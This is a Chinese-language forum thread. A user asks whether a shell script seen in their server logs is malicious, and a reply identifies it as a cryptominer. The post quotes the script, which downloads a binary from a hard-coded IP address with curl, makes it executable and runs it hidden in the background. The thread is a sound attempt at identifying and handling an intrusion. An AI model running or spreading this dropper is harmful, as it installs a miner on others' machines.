• 请不要在回答技术问题时复制粘贴 AI 生成的内容
fengci
V2EX  ›  程序员

这是什么东西,是恶意代码嘛?

  •  
  •   fengci · Dec 8, 2025 · 1015 views
    This topic created in 155 days ago, the information mentioned may be changed or developed.

    http://45.134.174.235:443/a1.sh

    服务器项目后台看请求了这个地址 看里面是一个下载

    rm -rf solrc
    BINARY_URL="http://45.134.174.235:443/solrc"
    FILENAME="solrc"
    curl -sLf -o "$FILENAME" "$BINARY_URL"
    chmod +x "$FILENAME"
    ./"$FILENAME" > /dev/null 2>&1 &
    
    jisxu
        1
    jisxu  
       Dec 8, 2025


    挖矿的
    fengci
        2
    fengci  
    OP
       Dec 8, 2025
    @Jisxu 好的谢谢,这是运行之后执行的命令是吗?想问下有什么方便的沙盒环境可以测试?
    jisxu
        3
    jisxu  
       Dec 8, 2025
    @fengci 随便搜个在线沙盒,把 solrc 丢上去检测就行
    About   ·   Help   ·   Advertise   ·   Blog   ·   API   ·   FAQ   ·   Solana   ·   3562 Online   Highest 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 35ms · UTC 11:21 · PVG 19:21 · LAX 04:21 · JFK 07:21
    ♥ Do have faith in what you're doing.